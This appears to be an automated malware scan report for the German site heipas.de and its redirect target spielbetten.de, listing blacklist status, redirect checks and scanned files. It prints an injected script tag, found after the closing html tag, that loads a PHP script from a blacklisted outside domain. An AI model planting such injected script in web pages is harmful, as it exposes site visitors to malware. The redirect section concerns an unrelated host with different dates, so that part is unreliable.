Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=heipas.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: avatarcat.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 07 Jul 2015 05:07:03 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: avatarcat.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 07 Jul 2015 05:07:03 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: avatarcat.com
Referer: http://www.google.com/search?q=avatarcat.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: avatarcat.com
Referer: http://www.google.com/search?q=avatarcat.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://heipas.de/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:47:27 GMT Location: http://www.spielbetten.de/ Server: Apache/2.2.10 (Linux/SUSE) Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://www.spielbetten.de/ | 200 OK Content-Length: 16633 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.schneiderjan.de ...[4183 bytes skipped]... t;script type="text/javascript"> /* <![CDATA[ */ new Request({ url:'system/html/cron.txt', onComplete: function(txt) { if (!txt) txt = 0; if (parseInt(txt) < (Math.round(+new Date()/1000) - 300)) { new Request({url:'cron.php'}).get(); } } }).get(); /* ]]> */ </script> </body> </html><script type="text/javascript" src="http://www.schneiderjan.de/kdtfmmjp.php?id=5806677"></script> | ||
http://www.spielbetten.de/system/scripts/e53a815ab435.js | 200 OK Content-Length: 180027 Content-Type: text/x-js | clean |
http://www.spielbetten.de/test404page.js | 404 Not Found Content-Length: 1051 Content-Type: text/html | clean |
http://heipas.de/plugins/ce_slider/ce_slider.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:47:29 GMT Location: http://www.spielbetten.de/plugins/ce_slider/ce_slider.js Server: Apache/2.2.10 (Linux/SUSE) Content-Length: 343 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://www.spielbetten.de/plugins/ce_slider/ce_slider.js | 200 OK Content-Length: 10729 Content-Type: text/x-js | clean |
http://heipas.de/plugins/mediabox/1.4.6/js/mediabox.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:47:29 GMT Location: http://www.spielbetten.de/plugins/mediabox/1.4.6/js/mediabox.js Server: Apache/2.2.10 (Linux/SUSE) Content-Length: 350 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://www.spielbetten.de/plugins/mediabox/1.4.6/js/mediabox.js | 200 OK Content-Length: 20292 Content-Type: text/x-js | clean |
http://www.spielbetten.de/plugins/mediabox/1.4.6/js/{x} | 404 Not Found Content-Length: 1051 Content-Type: text/html | clean |
http://heipas.de/system/scripts/dc67f59d9359.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:47:31 GMT Location: http://www.spielbetten.de/system/scripts/dc67f59d9359.js Server: Apache/2.2.10 (Linux/SUSE) Content-Length: 343 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://www.spielbetten.de/system/scripts/dc67f59d9359.js | 200 OK Content-Length: 18235 Content-Type: text/x-js | clean |
http://www.spielbetten.de/system/scripts/ | 200 OK Content-Length: 313 Content-Type: text/html | clean |
http://heipas.de/plugins/slimbox/js/slimbox.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:47:32 GMT Location: http://www.spielbetten.de/plugins/slimbox/js/slimbox.js Server: Apache/2.2.10 (Linux/SUSE) Content-Length: 342 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | malicious |
http://www.spielbetten.de/plugins/slimbox/js/slimbox.js | 200 OK Content-Length: 4107 Content-Type: text/x-js | clean |
http://www.schneiderjan.de/kdtfmmjp.php?id=5806677 | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |